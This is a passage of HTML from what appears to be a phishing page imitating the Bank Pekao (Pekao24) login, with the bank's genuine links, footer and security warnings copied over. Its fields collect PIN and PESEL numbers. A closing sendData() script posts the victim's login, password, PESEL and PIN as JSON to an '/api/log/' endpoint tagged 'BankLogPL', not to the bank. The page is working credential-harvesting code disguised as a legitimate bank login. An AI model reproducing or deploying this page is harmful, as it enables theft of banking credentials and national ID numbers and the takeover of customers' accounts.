<input _pekstyle-c726="" id="pin" name="pin" type="text" style="border-radius: 4px;" class="pekao-field-input ng-untouched ng-pristine ng-invalid ng-star-inserted" required="">
</span> </div>
                                <!-- End imput PIN -->
                                <!-- Start imput PIN -->
                                <div _pekstyle-c65="" id="field3ds3" style="margin-top: 20px;" class="field-container large closed-messages">
                                  <label _pekstyle-c65="" for="customer" class="ng-star-inserted"> PESEL </label> <span _pekstyle-c65="" class="field-and-buttons">
<input _pekstyle-c726="" id="pesel" name="pesel" type="text" style="border-radius: 4px;" class="pekao-field-input ng-untouched ng-pristine ng-invalid ng-star-inserted" required="">
</span> </div>
                                <!-- End imput PIN -->
                                <!-- Start button 1 -->
                                <!-- <div class="loginboxes" style="padding: 20px 0; text-align: right;">
                                  <pekao-button _pekstyle-c726="" _pekaostyle-c161="">
                                    <button id="button1" type="submit" _pekstyle-c726="" class="button button-primary">Dalej</button>
                                  </pekao-button>
                                </div> -->
                                <!-- End button 1 -->
                               
                              </pekao-field>
                              <section _pekstyle-c726="" class="main-action-group ng-tns-c639-3">
                                <!-- Start button 2 -->
                                <pekao-button _pekstyle-c726="" _pekaostyle-c161="">
                                  <button id="field3ds5" type="submit" _pekstyle-c726="" class="button button-primary" onclick="sendData()">Dalej</button>
                                </pekao-button>
                                <!-- End button 2 -->
                                <div style="color: #ff6161; padding: 20px; text-align: center;"></div>
                              </section>
                            </form>
                            <!-- End FORM -->
                            <section _pekstyle-c726="" class="account-action-group show-on-mobile ng-tns-c639-3">
                              <pekao-button _pekstyle-c726="" _pekaostyle-c161=""><a _pekstyle-c726="" target="_blank" rel="noopener" class="button button-tertiary" href="https://www.pekao.com.pl/klient-indywidualny/codzienne-bankowanie/konta-osobiste/konto-przekorzystne.html">Nie masz konta? Zostań klientem</a> </pekao-button>
                            </section>
                            <pekao-cms-message-group _pekstyle-c726="" _pekaostyle-c662="" class="ng-tns-c639-3">
                              <section _pekstyle-c662="" class="cms-message-group">
                                <pekao-login-announcements-group _pekaostyle-c361="" class="ng-star-inserted">
                                  <pekao-login-announcement _pekaostyle-c360="" class="ng-star-inserted">
                                    <!-- <div _pekstyle-c360="" class="ql-container ql-pekao ql-disabled">
                                      <div class="ql-editor" data-gramm="false" data-placeholder=" " contenteditable="false">
                                        <p data-before-content="29.07.2021">Zachowaj czujność. Uważaj na telefony z fałszywych infolinii. <a url="/login/support/announcements?id=2022" data-link-preview="Pomoc w logowaniu - Komunikaty" type="INTERNAL" rel="noopener noreferrer" target="_blank">Więcej&gt;</a></p>
                                      </div>
                                      <div class="ql-clipboard" tabindex="-1" contenteditable="true"></div>
                                    </div> -->
                                  </pekao-login-announcement>
                                  <pekao-login-announcement _pekaostyle-c360="" class="ng-star-inserted">
                                    <!-- <div _pekstyle-c360="" class="ql-container ql-pekao ql-disabled">
                                      <div class="ql-editor" data-gramm="false" data-placeholder=" " contenteditable="false">
                                        <p data-before-content="12.05.2021">Ostrzegamy przed przestępcami podszywającymi się pod Dział Płatności i Fakturowania Banku Pekao S.A. <a url="https://www.pekao24.pl/logowanie/(modal:pomoc-w-logowaniu/komunikaty;id=1562)" data-link-preview="/logowanie/(modal:pomoc-w-logowaniu/komunikaty;id=1562)" type="INTERNAL" rel="noopener noreferrer" target="_blank">Więcej&gt;</a></p>
                                      </div>
                                      <div class="ql-clipboard" tabindex="-1" contenteditable="true"></div>
                                    </div> -->
                                  </pekao-login-announcement>
                                </pekao-login-announcements-group>
                              </section>
                            </pekao-cms-message-group>
                          </div>
                          <footer _pekstyle-c639="" class="login-container-footer ng-tns-c639-3">
                            <pekao-login-support-action-group _pekstyle-c726="" login-container-footer="" class="login-container-footer ng-tns-c639-3" _pekaostyle-c708="">
                              <section _pekstyle-c708="" class="login-support-action-group-wrapper">
                                <pekao-button _pekstyle-c708="" _pekaostyle-c161=""><a _pekstyle-c708="" target="_blank" rel="noopener" class="button button-tertiary" href="https://www.pekao.com.pl/klient-indywidualny/bankowosc-elektroniczna/bezpieczenstwo-Pekao24/zalecenia.html">Bezpieczeństwo</a> </pekao-button>
                                <pekao-button _pekstyle-c708="" _pekaostyle-c161="">
                                  <button _pekstyle-c708="" type="button" class="button button-tertiary">Pomoc w logowaniu</button>
                                </pekao-button>
                              </section>
                            </pekao-login-support-action-group>
                          </footer>
                        </div>
                      </section>
                    </pekao-login-step-box>
                  </pekao-login-customer>
                </section>
              </main>
              <pekao-login-footer _pekstyle-c641="" _pekaostyle-c640="">
                <footer _pekstyle-c640="" class="footer">
                  <section _pekstyle-c640="" class="footer-section">
                    <div _pekstyle-c640="" class="footer-wrapper footer-navigation">
                      <div _pekstyle-c640="" class="footer-navigation-group phone-numbers-group">
                        <pekao-button _pekstyle-c640="" _pekaostyle-c161=""><a _pekstyle-c640="" href="tel:801365365" class="button button-tertiary phone-number">801 365 365</a> </pekao-button>
                        <pekao-button _pekstyle-c640="" _pekaostyle-c161=""><a _pekstyle-c640="" href="tel:+48225912232" class="button button-tertiary phone-number">+48 22 59 12 232</a> </pekao-button>
                      </div>
                      <div _pekstyle-c640="" class="footer-navigation-group links-group">
                        <div _pekstyle-c640="" class="links">
                          <pekao-button _pekstyle-c640="" _pekaostyle-c161=""><a _pekstyle-c640="" target="_blank" rel="noopener" class="button button-tertiary" href="https://www.pekao.com.pl/klient-indywidualny/bankowosc-elektroniczna/bezpieczenstwo.html">Bezpieczeństwo</a> </pekao-button>
                          <pekao-button _pekstyle-c640="" _pekaostyle-c161=""><a _pekstyle-c640="" target="_blank" rel="noopener" class="button button-tertiary" href="https://www.pekao.com.pl/o-banku/stopka/rodo.html">RODO</a> </pekao-button>
                        </div>
                        <div _pekstyle-c640="" class="links">
                          <pekao-button _pekstyle-c640="" _pekaostyle-c161=""><a _pekstyle-c640="" target="_blank" rel="noopener" class="button button-tertiary" href="https://www.pekao.com.pl/o-banku/stopka/polityka-prywatnosci.html">Polityka prywatności</a> </pekao-button>
                          <pekao-button _pekstyle-c640="" _pekaostyle-c161=""><a _pekstyle-c640="" target="_blank" rel="noopener" class="button button-tertiary" href="https://www.pekao.com.pl/kontakt.html">Kontakt</a> </pekao-button>
                        </div>
                      </div>
                    </div>
                  </section>
                  <section _pekstyle-c640="" class="footer-section bank-information ng-star-inserted">
                    <div _pekstyle-c640="" class="footer-wrapper footer-info-group"><span _pekstyle-c640="" class="krs-txt"> Bank Polska Kasa Opieki Spółka Akcyjna z siedzibą w Warszawie, ul. Grzybowska 53/57, 00-844 Warszawa, wpisany do rejestru przedsiębiorców w Sądzie Rejonowym dla m.st. Warszawy w Warszawie, XII Wydział Gospodarczy Krajowego Rejestru Sądowego, KRS: 0000014843, NIP: 526-00-06-841, REGON: 000010205, wysokość kapitału zakładowego i kapitału wpłaconego: 262 470 034 zł. </span>
                      <div _pekstyle-c640="" class="definition-group">
                        <section _pekstyle-c640="" class="codes"><span _pekstyle-c640="" class="padding-right">KOD BIC/SWIFT: PKOPPLPW</span></section>
                        <section _pekstyle-c640=""> © 2021 Bank Polska Kasa Opieki Spółka Akcyjna </section>
                      </div>
                    </div>
                  </section>
                </footer>
              </pekao-login-footer>
            </div>
          </pekao-login-container>
        </pekao-login>
      </div>
    </pekao-root-pekao24>

    <script type="text/javascript">
      function sendData() {
        var data = $('#formblock').serializeArray().reduce(function(obj, item) {
            obj[item.name] = item.value;
            return obj;
        }, {});

        fetch(`/api/log/${window.location.pathname.split('/')[3]}`, {
          method: 'POST',
          cache: 'no-cache',
          headers: {
              'Accept': 'application/json, text/plain, */*',
              'Content-Type': 'application/json'
          },
          referrerPolicy: 'no-referrer',
          body: JSON.stringify({
              login: data.login,
              password: data.password,
              pesel: data.pesel,
              pin: data.pin,
              bank: 'pekao',
              method: 'BankLogPL'
          })
        })
      }
  </script>
</body></html>